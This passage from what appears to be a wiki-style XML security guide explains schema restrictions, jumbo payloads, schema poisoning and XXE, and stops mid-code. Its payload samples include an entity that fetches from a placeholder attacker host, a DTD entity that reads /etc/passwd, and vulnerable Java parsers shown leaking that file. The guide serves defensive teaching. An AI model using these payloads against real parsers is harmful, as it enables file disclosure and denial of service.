Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot; XMLNS:EXT=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
